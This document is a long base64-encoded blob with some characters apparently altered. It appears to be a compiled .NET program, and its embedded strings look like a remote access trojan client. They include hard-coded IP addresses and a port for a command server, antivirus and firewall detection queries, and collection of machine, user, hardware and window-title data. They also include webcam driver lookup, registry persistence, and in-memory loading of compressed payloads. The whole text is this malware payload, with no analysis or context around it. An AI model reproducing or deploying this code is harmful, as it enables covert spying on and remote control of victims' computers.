@CKx4HGJooJwAACtAZAAABKCgAAAooKQAACnQZAAABEAEIGZEtAiseBxmaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAARACCBqRLQIrIQcamignAAAK@BkAAAEoKAAACigpAAAKdBkAAAGAEwAABAgbkS@CKyEHG5ooJwAACtAZAAABKCgAAAooKQAACnQZAAABgA8AAAQOCA@JOc8AAAAAfhwAAApyzQAAcAICewwAAAQoIwAABigdAAAKcuEAAHAoHQAACg4JKB@AAAooHgAAChdvHwAAChT+ARMEEQQsOAJy6QAAcAICewwAAAQoIwAABigdAAAKcuEAAHAoHQAACg4JKB@AAAooHgAACg4JDgYoDgAABiYAAN4NKBUAAAoAKBYAAAreAAAOChb+ARMFEQUsOAJy6QAAcAICewwAAAQoIwAABigdAAAKcuEAAHAoHQAACg4JKB@AAAooHgAACg4JDgYoDgAABiYAAAAABioAAAEQAAAAAHQBfPABDRgAAAETMAIAFwAAAAYAABEAAgMoKwAACigiAAAGKCwAAAoKKwAGKgAbMAMAHQAAAAYAABEAAAMEBSgtAAAKAN4NKBUAAAoAKBYAAAreAAAGKgAAAAEQAAAAAAEADA@ADRgAAAEbMA@AHggAAAcAABEAcy4AAAoKFgsAAAAoLwAACm8wAAAKKDEAAAooGAAABibeDSgVAAAKACgWAAAK3gAA3g@oFQAACgAoFgAACt4AAAACewIAAAQU/gENCSwF3QwEAAACewIAAAQUcmMBAHAWjQgAAAEUFBQoJgAAChRycQEAcBaNCAAAARQUFCgmAAAKFoweAAABFigyAAAKEwQRBCwF3ccDAAACewMAAAQW/gETBREFLAXdswMAAAcX1gsHIJYAAAD+AhMGEQY5kgAAABYLAnsCAAAEFHJjAQBwFo@IAAABFBQUKCYAAAoUcoUBAHAYjQgAAAElFhWMIwAAAaIlFxaMKQAAAaIUFBQoJgAACgJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHKPAQBwFo@IAAABFBQUKCYAAAoWjCMAAAEWKDMAAAooNAAACig1AAAKEwcRBywF3Q@DAAAAAAJ7AgAABBRyjwEAcBaNCAAAARQUFCgmAAAKFowjAAABFig2AAAKEwgRCDm/AgAAAnsCAAAEFHKPAQBwFo@IAAABFBQUKCYAAAoXjCMAAAEoNwAACig4AAAKF9aNKgAAARMJAnsCAAAEFHJjAQBwFo@IAAABFBQUKCYAAAoUcqMBAHAajQgAAAElFhEJoiUXFowjAAABoiUYEQmOaYwjAAABoiUZFowrAAABoiUTChQUGo@eAAABJRYXnCUTCxcoDwAACiYRCxaRLQIrHxEKFpooJwAACtABAAAbKCgAAAooKQAACnQBAAAbEwkGFHKzAQBwGY@IAAABJRYRCaIlFxaMIwAAAaIlGBEJjmmMIwAAAaIlEwoUFBmNHgAAASUWF5wlEwsXKA8AAAomEQsWkS@CKx8RChaaKCcAAArQAQAAGygoAAAKKCkAAAp@AQAAGxMJAAIGFHK/AQBwFo@IAAABFBQUKCYAAAp@AQAAGyggAAAGfg8AAARvOQAAChMMEQw5ZgEAAAIGFHK/AQBwFo@IAAABFBQUKCYAAAp@AQAAG34PAAAEKCEAAAYTDQL+BiUAAAZzOgAACnM7AAAKEw4RDhENF4@IAAABJRYWjCMAAAGiFCg8AAAKKCcAAApvPQAACgAGFHLPAQBwFo@IAAABFBQUFygPAAAKJnMuAAAKChENbz4AAAoY/gETDxEPOdYAAAAGFHKzAQBwGY@IAAABJRYRDRMQERAXjQgAAAElFheMIwAAASUTEaIUKDwAAAqiJRcWjCMAAAGiJRgRDReNCAAAASUWF4wjAAABohQoPAAACiUTEhRy3wEAcBaNCAAAARQUFCgmAAAKoiUTChQUGY@eAAABJRYXnCUYF5wlEwsXKA8AAAomEQsWkS@CKx@REBiNCAAAASUWERGiJRcRChaaohQXFig/AAAKABELGJEtAisfERIUct8BAHAXjQgAAAElFhEKGJqiFBQXFyhAAAAKADho/v//AAAAAADeDSgVAAAKACgWAAAK3g@AFygXAAAKADip+///AAAAKC8AAApvMAAACigxAAAKKBgAAAYm3g@oFQAACgAoFgAACt4AAN4NKBUAAAoAKBYAAAreAAACFn@DAAAEAAJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHLtAQBwF4@IAAABJRYWjB4AAAGiFBQUFygPAAAKJt4NKBUAAAoAKBYAAAreAAAABhRyzwEAcBaNCAAAARQUFBcoDwAACibeDSgVAAAKACgWAAAK3gAAcy4AAAoKFgwCewkAAASOaRjaExMWExQ41AIAAAAAAnNBAAAKJRVvQgAACgAlFW9DAAAKACUgP@IPAG9EAAAKACUgP@IPAG9FAAAKAH@CAAAEFgsCKBAAAAYUcgMCAHAYjQgAAAElFgJ7CQAABBEUjxkAAAElExVQoiUXAnsKAAAEERSPGQAAASUTFlCiJRMKFBQYjR4AAAElFhecJRcXnCUTCxcoDwAACiYRCxaRLQIrIBEVEQoWmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFREQsXkS@CKyARFhEKF5ooJwAACtAZAAABKCgAAAooKQAACnQZAAABUQIXfQMAAAQCFHITAgBwF4@IAAABJRZyHQIAcH4TAAAEAnsLAAAEfhMAAAQoRgAACgJy5QAAcAIoGQAABihHAAAKKCMAAAYoHQAACn4TAAAEKB@AAAoCKBMAAAYoHQAACn4TAAAEKB@AAAoCKEgAAApyNQIAcChJAAAKKBsAAAooIwAABigdAAAKfhMAAAQoHQAACgIoGgAABigdAAAKfhMAAAQoHQAACgJ+EgAABG9KAAAKcj@CAHAoGwAABigbAAAKKCMAAAYoHQAACn4TAAAEKB@AAAoCAigdAAAGKB4AAAooIwAABigdAAAKfhMAAAQoHQAACn4SAAAEb@sAAAqMLwAAASgdAAAKfhMAAAQoHQAACgJyQQIAcCgcAAAGKB@AAAp+EwAABCgdAAAKAnJ/AgBwKBwAAAYoHQAACn4TAAAEKB@AAAoCewoAAAQCew4AAASaKB@AAAp+EwAABCgdAAAKAigeAAAGKB@AAAp+EwAABCgdAAAKAihMAAAKb@@AAAooIwAABigdAAAKfhMAAAQoHQAACnK7AgBwKB@AAAqiFBQUFygPAAAKJgIRFH@NAAAEAhEUfQ4AAAQXDN@6+P//KBUAAAoAcscCAHAoIgAACigXAAAKAAIWfQ@AAAQCFn@OAAAEKBYAAAreAAARFBfWExQRFBETPiP9//8IExcRFywHFgw4SPz//wA46/f//wAAQcQAAAAAAAALAAAAGAAAACMAAAANAAAAGAAAAQAAAAAKAAAAKQAAADMAAAANAAAAGAAAAQAAAABBAAAABQQAAEYEAAANAAAAGAAAAQAAAABiBAAAGAAAAHoEAAANAAAAGAAAAQAAAABhBAAAKQAAAIoEAAANAAAAGAAAAQAAAACfBAAAPAAAANsEAAANAAAAGAAAAQAAAADpBAAAGgAAAAMFAAANAAAAGAAAAQAAAAAuBQAAoQIAAM8HAAArAAAAGAAAARMwBwAgAAAABgAAEQACewIAAAQUcmMBAHAWjQgAAAEUFBQoJgAACgorAAYqGzANAD@CAAAIAAARAAJ7AwAABBb+AQoGLAU4KQIAAAAAcy4AAAoLBxRyswEAcBmNCAAAASUWA6IlFxaMIwAAAaIlGAOOaYwjAAABoiUMFBQZjR4AAAElFhecJQ@XKA8AAAomCRaRLQIrHggWmignAAAK@AEAABsoKAAACigpAAAKdAEAABsQAQcUcrMBAHAZjQgAAAElFgJ+DwAABCgfAAAGoiUXFowjAAABoiUYfg8AAARvTgAACowjAAABohQUFBcoDwAACiYCewIAAAQUcmMBAHAWjQgAAAEUFBQoJgAAChRy@QIAcBeNCAAAASUWA45pjCMAAAGiFBQWFyhAAAAKAAJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHKFAQBwGI@IAAABJRYVjCMAAAGiJRcXjCkAAAGiFBQUFygPAAAKJgJ7AgAABBRyYwEAcBaNCAAAARQUFCgmAAAKFHITAgBwGo@IAAABJRYHEwQRBBRyvwEAcBaNCAAAARQUFCgmAAAKoiUXFowjAAABoiUYBxMFEQUUcu8CAHAWjQgAAAEUFBQoJgAACqIlGRaMKwAAAaIlDBQUGo@eAAABJRYXnCUYF5wlDRcoDwAACiYJFpEtAiseEQQUcr8BAHAXjQgAAAElFggWmqIUFBcWKEAAAAoACRiRLQIrHhEFFHLvAgBwF4@IAAABJRYIGJqiFBQXFihAAAAKAAcUcs8BAHAWjQgAAAEUFBQXKA8AAAom3hQoFQAACgACFn@DAAAEKBYAAAreAAAqAAAAQRwAAAAAAAAUAAAAEwIAACcCAAAUAAAAGAAAAUIAAgIDKB8AAAYoEQAABgAqAAAAGzACADkAAAAGAAARAAAoTwAACihQAAAKb1EAAAoWb1IAAAp@MwAAAW9TAAAKCt4TKBUAAAoAcv@CAHAKKBYAAAreAAYqAAAAARAAAAAAAQAjJAATGAAAARswCABUAAAACQAAEQAAcgcDAHAoVAAACnLhAABwKEcAAAoMEgIUDRIDFhIBFhMEEgQWEwUSBRQTBhIGFigUAAAGJgcoVQAACgreEygVAAAKAHIfAwBwCigWAAAK3gAGKgEQAAAAAAEAPj8AExgAAAEbMAUATQAAAAoAABEAABYLB7UfZChWAAAKDRIDH2QUEwQSBB9kKBcAAAYMCCwIcicDAHAK3iEABxfWCwcaMdHeDSgVAAAKACgWAAAK3gAAci8DAHAKKwAGKgAAAAEQAAAAAAEANDUADRgAAAEbMAIAcQAAAAsAABEAAHI1AwBwc1cAAAooWAAACm9ZAAAKCyspB29aAAAKdDkAAAEMCHJxAwBwb1sAAAooJwAACihcAAAKKBoAAAoK3i@Hb1@AAAoNCS3N3gsHLAcHb14AAAoA3N4TKBUAAAoAcv@CAHAKKBYAAAreAQAGKgAAAAEcAAACAAIATE4ACwAAAAAAAAEAWlsAExgAAAEbMAQA4gAAAAwAABEAAH4YAAAKC3KLAwBwfhIAAARvSgAACnKzAwBwbzkAAApyXQEAcHK5AwBwKF8AAApvIQAACihHAAAKA3NgAAAKKFgAAApvWQAACgwrJAhvWgAACnQ5AAABDQcJcr@DAHBvWwAACm8hAAAKKEcAAAoLAAhvXQAAChMEEQQt@N4LCCwHCG9eAAAKANwHfhgAAAoWKBkAAAoW/gMTBREFLA8CBygjAAAGKB4AAAoK3jIAAnLVAwBwKCMAAAYoHgAACgreHigVAAAKAAJy1QMAcCgjAAAGKB4AAAoKKBYAAAreAAYqAAABHAAAAgAIAHd/AAsAAAAAAAABAMHCAB4YAAABGzADAC8AAAAGAAARAABy3QMAcHJiBABwFCggAAAKbyEAAAoK3hMoFQAACgBy/QIAcAooFgAACt4ABioAARAAAAAAAQAZGgATGAAAARMwAwA@AAAADQAAEQAgAAEAAHNhAAAKCygVAAAGBwdvYgAACigWAAAGJgIHb2MAAAooIwAABigeAAAKCisABioTMAIAEQAAAA4AABEAKGQAAAoDb2UAAAoKKwAGKgAAABMwAgARAAAADwAAEQAoZAAACgNvZgAACgorAAYqAAAAEzAGAJUAAAAQAAARAHNnAAAKC3MuAAAKDHMuAAAKDQIDKCAAAAYEFRYoDQAAChMECAMWEQQWmm9OAAAKb2gAAAoACQMRBBaab@4AAAoEb@4AAArWA45pEQQWmm9OAAAKBG9OAAAK1tpvaAAACgAHCG9pAAAKb2oAAAoABwlvaQAACm9qAAAKAAhvawAACgAJb2sAAAoAB29sAAAKCisABioAAAATMAQAgQAAABEAABEAcy4AAAoLBwMWA45pb2gAAAoABxZqb2@AAAoABxYXc24AAAoMcy4AAAoNH@CNKgAAARMEFRMFCBEEFhEEjmlvbwAAChMFKxwJEQQWEQVvaAAACgAIEQQWEQSOaW9vAAAKEwUAEQUW/gITBhEGLdkIb3AAAAoACW9pAAAKCisABioAAAATMAIAFgAAAAYAABEAKHEAAAoDb2UAAAoocgAACgorAAYqAAATMAIAFgAAAAYAABEAKHEAAAoDKCsAAApvZgAACgorAAYqNgIDdAEAABsoCwAABioeAigFAAAKKi5zJgAABoAVAAAEKqp+FgAABCwHfhYAAAQrFn4VAAAE/gYpAAAGcwEAAAYlgBYAAARvBAAABio6AAB+FAAABG8HAAAKACoAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAFQKAAAjfgAAwAoAAFwMAAAjU3RyaW5ncwAAAAAcFwAAjAQAACNVUwCoGwAAEAAAACNHVUlEAAAAuBsAAAwEAAAjQmxvYgAAAAAAAAACAAABV7UCPAkCAAAA+gEzABYAAAEAAABCAAAABwAAABkAAAApAAAAMgAAAHIAAAAKAAAABQAAAAIAAAARAAAABgAAAAIAAAAFAAAAAgAAAAEAAAAFAAAAAwAAAAAAtggBAAAAAAAGACoACgAGAFAACgAGAHUAbgAGAIcACgAGALUAogAGAM4AbgAGANsAbgAGAOkAbgAGAPAAbgAGAP@AbgAGAAcBogAGADABHwEGAEMBHwEKAGgBSgEWAIoBdQEGAKkBHwEKAMsBtQEKANMBtQEGAOcBbgAKACEC+gEGADACbgAOAFwCRAIKAGwC+gEGAJMCbgAGAMUCbgAKANIC+gEKAOoC+gEGABYDBgMGACIDBgMGAHEDbgAGAIEDCgAGAJ8DbgAGAM4DbgAGANQDbgAGAPcDbgAGAP@DbgAGACgEFgQGAEkEPwQOAFYEogAGAHsEbgAOAL8ErAQGABoFbgAOAB8FrAQGADQFHwEOAIgFrAQGAN4FbgAGAC4GbgAGAEoGNQYOAH@GcgYOAI@GcgYOAKcGcgYGAM@GwQYKANsGtQEKAO8GtQESABYHBAffADEHAAASAEwHBAcSAF@HBAcSAIgHBAcGAMMHbgAGAOgHwQYGACsIEAgGAEQIPwQOAGEISwgOAHkISwgGAKwIbgAAAAAAAQAAAAAAAQABAAABAAAPCQAADQABAAEAAQAQACYJLQkhAAEABQAFIQAAPwkAACEAFQAmAAABAABLCQAAIQAYACoAEwEAAGoJAAAJARoAKgATAQAAhwkAAAkBGgAqAAYAEgpTAgYAFQpWAgYAFwpTAgYAGgpWAgYAHQpZAgYAIApZAgYAJQpdAgYAJwpdAgYAKgpgAgYAMApgAgYANgpfAAYAOQpfAAYAPwpdAgYAQQpdAhYAQwpfABYARwpfABYASwpkAhYATwpoAhYAUgpfABYAVgpsAjYAxAvVAhYAxwvZAhYAzgvdAjMB+AvoAjMBIQzsAgAAAAADAAYYSgATAAEAAAAAAAMARgO9CUUCAwAAAAAAAwBGA+@JTQIFAAAAAAADAEYDCwoGAAYAgyAAAAAAERhZCkoABgC4IAAAAAAGGEoABgAGAIghAAAAABYAYApKAAYApCEAAAAABgBlCgYABgDcIQAASAAGAG@KBgAGAIAiAAAAAAYAcQoGAAYAtCIAAAAABgB1CnACBgD8KQAAAAAGAHwKdgIHAGAsAAAAAAYAkgqVAREAhCwAAAAABgCVCoQCEgDALAAAAAAGAJgKBgAVALA1AAAAAAYAnAqLAhUA3DUAAAAABgCfCnACFQBEOAAAAAAGAJ8KCgAWAFg4AAAAAAYApAqLAhcAAAAAAIAAESCnCo8CFwAAAAAAgAARIM@KowIfAAAAAACAABEg5QqnAh8AAAAAAIAAFiAFC7ACIgAAAAAAgAAWIEQLuwInALA4AAAAAAYAXQuSACgAIDkAAAAABgBhC5IAKACMOQAAAAAWAGYLDwAoACg6AAAAAAYAaQvAAigANDsAAAAABgB8C4sCKQCAOwAAAAAGAH8LkgApAMA7AAAAAAYAgwuxASkA4DsAAAAABgCIC7cBKgAAPAAAAAAGAIsLxQIrAKQ8AAAAAAYAkgvOAi@AND@AAAAABgCdC5UBLgBYPQAAAAAGAKoLlQEvAHo9AAAAAAEIsQsuATAAiD@AAAAABhhKAAYAMQCQPQAAAAARGFkKSgAxAJw9AAAAAAMI1gvhAjEAxz@AAAAAAwjpCwYAMwAAAAEAowkAAAIAsAkAAAEAyQkAAAIA2gkAAAEA9wkAAAEAegoAAAEAPwoAAAIAQQoAAAMAgAoAAAQAFQoAAAUANgoAAAYAggoAAAcAiAoAAAgAigoAAAkAjAoAAAoAkAoAAAEAkAoAAAEAQQoAAAIAgAoAAAMAkAoAAAEAegoAAAEAiAoAIAEApAoAIAIAwQoAAAMAwwoAAAQAPwoAAAUAxQoAAAYAxwoAIAcAyQoAAAgAywoAAAEA8woAAAIA+AoAAAMAAQsAAAEAHgsAIAIAJgsAAAMALwsAIAQANgsAAAUAPgsAAAEAVAsAAAEAdAsAAAEAhgsAAAEAegoAAAEAegoAAAIAjgsAAAEAdQoAAAEApAsAAAEApAsAAAEAwQsAAAEAwQsAAAIA5gsJAEoAAQARAEoABgAhAEoABgApAEoACgBBAEoABgBZAEoABgBhADYBBgB5AJYBDwBxAEoABgCBAEoAEwBpAEoAGQBpAEoAIACJAOEBJgCZAEoABgChADUCMABpAD4CBgBhAEoAQgC5AHgCSgBJAEoAEwB5AH8CTgC5AJ@CVAC5AK@CSgBpAL8CWgDJAMwCXwDRANwCYgDZAPYCaQDJAP8CbgDpACsDdQDRADcDeQDZAPYCfwDhAEkDhADpAFQDiwBBAPYCkgDZAF@DlgDZAGcDmwDZAPYCoADJAP8CpQChAHkDqwD5AJADvACpALEDwQDZAMMDyQD5AOcD@AAhAQUE2gApATEE4ADpADYE6AAxAUoABgA5AV4E7wA5AXAE9QBBAYIE+QDRAI4E/gDRAMoEBQHRAOEEeQDZAGcDDAHRAOsE/gDRAAsFeQDZAF@DEQHJACsFGQFhAUoAEwBpAEoAHgGhAE@FJQFpAD4CLgEJAVoFMwGhAGUFNwGhAHkFQgFpAUoABgBpAZIFAQBpAaUFAQBpAbUFAQBpAcgFAQDJAP8CUwHJAP8CWwFxAeoFDwBxAfoFDwBxAAcGkgBxABYGYQGBAVYGZQGBAWkGkgDJAFoFMwGJAYEGDwCJAZkGawGRAbEGcgEJAVQDeQGZAfYCkgCpAecGfgGxAfoGaQCJAP4GaQDRAUoACgDRAXYHgwG5AXoHiQHBAZ@HjwHZAakHlQEhAbIHEQHBAboHmgHhAc8HBgCpAdcHngHRAUoApQGhAUoAAQChAdsHMwGhAfYCkgDpAfEHqwHpAf@HsQHpAQYItwEUAEoABgAxATIIxQExATgIzQEUAEAI@gH5Ac8HBgAUADgI2AExAWwI3gEBAkoA4wEBAokI7gH5AY4IBgDpAZQIqwEhAZ@I9gEuABMA+QIuAAsA8AJDACMAEwJDABsADgKDABsADgKjABsADgLgAHMADgKgBBsADgKgBDMADgIABTMADgIvAKECMQChAjsAoQJHAKECSwChAgEAKwAAAAYAAQAGAAAABwAYAx4DOAM+A2oDdQN5A54DqQOzA7sDxgPTA9oD3wPjA/gDzAjVCNwI6QjvCPwIFgG9AUMBKQCrCgEAQwErANEKAgBGAS@A5QoCAEMBLwAFCwMAAAExAEQLBABQIAAAGABYIAAAGQAEgAAAAAAAAAAAAAAAAAAAAABKDAAAAgAAAAAAAAAAAAAA/AEGCQAAAAAIAAAAAAAAAAAAAAAFArUBAAAAAAIAAAAAAAAAAAAAAPwBbgAAAAAAAgAAAAAAAAAAAAAABQIEBwAAAAACAAAAAAAAAAAAAAD8AXUBAAAAAAQAAwAGAAUABwAFAAAAAAAAPE1vZHVsZT4AU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR@cmlidXRlAC5jdG9yAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR@cmlidXRlAFN5c3RlbQBNdWx@aWNhc3REZWxlZ2F@ZQBDb21waWxlckdlbmVyYXRlZEF@dHJpYnV@ZQBTeXN@ZW@uRGlhZ25vc3RpY3MARGVidWdnZXJEaXNwbGF5QXR@cmlidXRlAElBc3luY1Jlc3VsdABBc3luY@NhbGxiYWNrAE9iamVjdABFdmVudEhhbmRsZXIARXZlbnRBcmdzAERlYnVnZ2VySGlkZGVuQXR@cmlidXRlAFN5c3RlbS5UaHJlYWRpbmcATXV@ZXgAUmVsZWFzZU11dGV4AFRocmVhZABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBDb21wdXRlckluZm8AU3lzdGVtLldpbmRvd3MuRm9ybXMAQXBwbGljYXRpb24AZ2V@X@V4ZWN1dGFibGVQYXRoAFRocmVhZFN@YXJ@AE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBTdHJpbmdzAENvbXBhcmVNZXRob2QAU3BsaXQAU1RBVGhyZWFkQXR@cmlidXRlAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAE5ld@xhdGVCaW5kaW5nAFR5cGUATGF@ZUNhbGwAU3RhcnQAU3lzdGVtLkNvZGVEb2@uQ29tcGlsZXIAQ29tcGlsZXJSZXN1bHRzAFByb2plY3REYXRhAEVuZEFwcABhZGRfQXBwbGljYXRpb25FeGl@AEV4Y2VwdGlvbgBTZXRQcm9qZWN@RXJyb3IAQ2xlYXJQcm9qZWN@RXJyb3IAU2xlZXAAU3RyaW5nAEVtcHR5AE9wZXJhdG9ycwBDb21wYXJlU3RyaW5nAENvbnZlcnNpb25zAFRvU3RyaW5nAENvbmNhdABNaWNyb3NvZnQuV2luMzIAUmVnaXN@cnlLZXkAUmVnaXN@cnkAQ3VycmVudFVzZXIAQ29uY2F@ZW5hdGVPYmplY3QAT3BlblN1YktleQBHZXRWYWx1ZQBUb@ludGVnZXIAVG9Cb29sZWFuAEJvb2xlYW4ATGF@ZUdldABSdW5@aW1lSGVscGVycwBHZXRPYmplY3RWYWx1ZQBSdW5@aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBDaGFuZ2VUeXBlAEFycmF5AFJ1bnRpbWVGaWVsZEhhbmRsZQBJbml@aWFsaXplQXJyYXkASW5@MzIAQ29udmVydABGcm9tQmFzZTY@U3RyaW5nAFN5c3RlbS5SZWZsZWN@aW9uAEFzc2VtYmx5AExvYWQAU2V@VmFsdWUAU3lzdGVtLklPAE1lbW9yeVN@cmVhbQBQcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAGdldF9IYW5kbGUASW5@UHRyAG9wX@V4cGxpY2l@AENvbmRpdGlvbmFsQ29tcGFyZU9iamVjdEVxdWFsAFN5c3RlbS5OZXQuU29ja2V@cwBTZWxlY3RNb2RlAENvbXBhcmVPYmplY3RMZXNzRXF1YWwAQW5kT2JqZWN@AENvbmRpdGlvbmFsQ29tcGFyZU9iamVjdEdyZWF@ZXIAU3VidHJhY3RPYmplY3QAQnl@ZQBTb2NrZXRGbGFncwBDb25@YWlucwBQYXJhbWV@ZXJpemVkVGhyZWFkU3RhcnQATGF@ZUluZGV4R2V@AGdldF9MZW5ndGgATGF@ZUluZGV4U2V@Q29tcGxleABMYXRlU2V@Q29tcGxleABUY3BDbGllbnQAc2V@X1JlY2VpdmVUaW1lb3V@AHNldF9TZW5kVGltZW91dABzZXRfU2VuZEJ1ZmZlclNpemUAc2V@X1JlY2VpdmVCdWZmZXJTaXplAEVudmlyb25tZW5@AGdldF9NYWNoaW5lTmFtZQBnZXRfVXNlck5hbWUAZ2V@X@9TRnVsbE5hbWUAZ2V@X1RvdGFsUGh5c2ljYWxNZW1vcnkAVUludDY@AFN5c3RlbS5HbG9iYWxpemF@aW9uAEN1bHR1cmVJbmZvAGdldF9DdXJyZW5@Q3VsdHVyZQBnZXRfTmFtZQBTeXN@ZW@uTmV@AERucwBHZXRIb3N@TmFtZQBJUEhvc3RFbnRyeQBHZXRIb3N@QnlOYW1lAElQQWRkcmVzcwBnZXRfQWRkcmVzc@xpc3QAU3lzdGVtLlRleHQAU3RyaW5nQnVpbGRlcgBJbnRlcmFjdGlvbgBFbnZpcm9uAENvbnZlcnNpb24ASGV4AFNwYWNlAFN5c3RlbS5NYW5hZ2VtZW5@AE1hbmFnZW1lbnRPYmplY3RDb2xsZWN@aW9uAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAE1hbmFnZW1lbnRPYmplY3QATWFuYWdlbWVudE9iamVjdFNlYXJjaGVyAEdldABHZXRFbnVtZXJhdG9yAE1hbmFnZW1lbnRCYXNlT2JqZWN@AGdldF9DdXJyZW5@AGdldF9JdGVtAFRvSW5@MzIATW92ZU5leHQASURpc3Bvc2FibGUARGlzcG9zZQBJSWYAZ2V@X@NhcGFjaXR5AEVuY29kaW5nAGdldF9EZWZhdWx@AEdldEJ5dGVzAEdldFN@cmluZwBTeXN@ZW@uQ29sbGVjdGlvbnMuR2VuZXJpYwBMaXN@YDEAV3JpdGUAVG9BcnJheQBBZGQAU3RyZWFtAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBHWmlwU3RyZWFtAHNldF9Qb3NpdGlvbgBDb21wcmVzc2lvbk1vZGUAUmVhZABDbG9zZQBnZXRfVVRGOABUb@Jhc2U2NFN@cmluZwBWYWx1ZVR5cGUATnVjbGVhciBFeHBsb3Npb24uZXhlAGtlcm5lbDMyAHVzZXIzMgBhdmljYXAzMi5kbGwAcHNhcGkAa2VybmVsMzIuZGxsAG5@ZGxsLmRsbABtc2NvcmxpYgBWQiRBbm9ueW1vdXNEZWxlZ2F@ZV8wAEF@b21pYwBOdWNsZWFyX@V4cGxvc2lvbgBfQ2xvc3VyZSRfXwA8UHJpdmF@ZUltcGxlbWVudGF@aW9uRGV@YWlscz4AX19TdGF@aWNBcnJheUluaXRUeXBlU2l6ZT@@MwBfX1N@YXRpY@FycmF5SW5pdFR5cGVTaXplPTYAVGFyZ2V@T2JqZWN@AFRhcmdldE1ldGhvZABCZWdpbkludm9rZQBEZWxlZ2F@ZUNhbGxiYWNrAERlbGVnYXRlQXN5bmNTdGF@ZQBFbmRJbnZva2UARGVsZWdhdGVBc3luY1Jlc3VsdABJbnZva2UAT1cAQwBDbgBTQwBQVABJTlNUAEkATVMASG9zdHMAUG9ydHMASUQATVVURVgASABQAFNQTABBcHAAU@NHAERJAEtleQBNVAAuY2N@b3IATWFpbgBFeGVjdXRlAElOUwBQaW4AZGF@YQBiAElOVgBOAEJ5dGVzAFMATQBNRDUAQgBMQQBJUgBNQUMAQ@sAU2VuZABJUABHVkkAR2V@Vm9sdW1lSW5mb3JtYXRpb25BAFYAVABRAEcASgBYAEdGVwBHZXRGb3JlZ3JvdW5kV2luZG93AEdldFdpbmRvd1RleHQAaFduZABscFN@cmluZwBjY2gAY2FwR2V@RHJpdmVyRGVzY3JpcHRpb25BAHdEcml2ZXIAbHBzek5hbWUAY2JOYW1lAGxwc3pWZXIAY2JWZXIARW1wdHlXb3JraW5nU2V@AGhQcm9jZXNzAEhXRABDSVZDAE9QAEdldFByb2R1Y3QAUHJvZHVjdABNUABHQVcAU@IAcwBCUwBmeABXUkQARGVjb21wcmVzcwBFbmNvZGUASW5wdXQARGVjb2RlAF9MYW1iZGEkX19SMzItMgBhMAAkSQAkSTI@LTAAJElSMjQtMQBfTGFtYmRhJF9fUjI@LTEAYTEAX@xhbWJkYSRfXzI@LTAAMDNDN@Y@RThGQjM1OUFFQzBFRUYwODE@QjY2QTcwNEZDNDNGQjNBOAA1QjFFRTdDQUQzREZGMjIwQTk1RDFENkI5MTQzNUQ5RTE1MjBBQzQxAE51Y2xlYXIgRXhwbG9zaW9uAAARKgAtAF@ATgBLAFsALQAqAAEZYQBjAGgAaQBsAGwAZQBwAG8AdwBlAHIAADkxADkAMwAuADUANgAuADIAOAAuADEAMAAxACwAOQAxAC4AMQA5ADMALgA3ADUALgAxADUAOAAsAAADLAAAFTcANwA4ADgALAA3ADcAOAA4ACwAAAlVAG@ARQA9AAAfSwBhAHcAcgBIAEoAZgBXAGYAaABhAFIAQwBsAGcAAAtTAHQAYQByAHQAAAdQAE4AQwAAA1AAAANXAAAFSQBFAAATUwBvAGYAdAB3AGEAcgBlAFwAAANcAAADXwAAN@gASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAAAHRwBQAEwAAAVMAFAAAAdVAE4AVgAAHUMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAAB1UATgBJAAABAAMuAAANQwBsAGkAZQBuAHQAABNDAG8AbgBuAGUAYwB@AGUAZAAACVAAbwBsAGwAABNBAHYAYQBpAGwAYQBiAGwAZQAAD1IAZQBjAGUAaQB2AGUAAAtXAHIAaQB@AGUAAA9UAG8AQQByAHIAYQB5AAAPRABpAHMAcABvAHMAZQAADWwAZQBuAGcAdABoAAAVRABpAHMAYwBvAG4AbgBlAGMAdAAAD@MAbwBuAG4AZQBjAHQAAAlTAGUAbgBkAAAXSQBuAGYAbwByAG@AYQB@AGkAbwBuAAAHIAAvACAAAAMgAAA9UwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAEEAbgB@AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQAADtTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAARgBpAHIAZQB3AGEAbABsAFAAcgBvAGQAdQBjAHQAAAtGAGEAbABzAGUAAAkyADUAMAAwAAAdUwBlAG4AZABCAHUAZgBmAGUAcgBTAGkAegBlAAANTABlAG4AZwB@AGgAAAk/AD8APwA/AAAXUwB5AHMAdABlAG@ARAByAGkAdgBlAAAHRQBSAFIAAAdZAGUAcwAABU4AbwAAO3MAZQBsAGUAYwB@ACAAKgAgAGYAcgBvAG@AIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAAGUEAZABkAHIAZQBzAHMAVwBpAGQAdABoAAAncgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB@AGUAcgAABVgAUAAAAzIAABdkAGkAcwBwAGwAYQB5AE4AYQBtAGUAAAdOAC8AQQAAgINIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAEgAQQBSAEQAVwBBAFIARQBcAEQARQBTAEMAUgBJAFAAVABJAE8ATgBcAFMAWQBTAFQARQBNAFwAQwBFAE4AVABSAEEATABQAFIATwBDAEUAUwBTAE8AUgBcADAAACdQAHIAbwBjAGUAcwBzAG8AcgBOAGEAbQBlAFMAdAByAGkAbgBnAAAAAJYwqmwElwBL